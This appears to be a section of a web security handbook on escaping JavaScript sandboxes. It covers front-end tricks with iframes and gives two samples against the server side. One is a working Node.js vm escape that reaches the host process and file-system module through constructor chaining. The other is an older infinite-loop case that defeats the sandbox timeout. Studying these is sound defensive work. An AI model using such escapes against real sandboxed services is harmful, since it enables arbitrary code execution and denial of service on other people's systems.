5.4.8. Sandbox escape

5.4.8.1. Frontend Sandbox

In the front end , the sandboxing of the front end may be done using delete eval , evalrewrite Function.prototype.constructor / GeneratorFunction / AsyncFunction etc. In this case, you can use the method of creating a new iframe to obtain a new execution environment.GeneratorFunctionAsyncFunction.

5.4.8.2. Server Sandbox

JavaScript provides native vm modules for isolating code contexts. However, the standard JavaScript API and the global NodeJS environment are still accessible in this environment.

In the native sandbox module, the commonly used escape methods are:

const vm = require('vm');
const sandbox = {};
const whatIsThis = vm.runInNewContext(`
    const ForeignObject = this.constructor;
    const ForeignFunction = ForeignObject.constructor;
    const process = ForeignFunction("return process")();
    const require = process.mainModule.require;
    require("fs");
`, sandbox);

Considering the defects of JavaScript’s native vm module, some developers have designed vm2 to provide a more secure isolation environment, but there are also some escape methods in the old version, such as:

vm.runInNewContext(
  'Promise.resolve().then(()=>{while(1)console.log("foo", Date.now());}); while(1)console.log(Date.now())',
  {console:{log(){console.log.apply(console,arguments);}}},
  {timeout:5}
);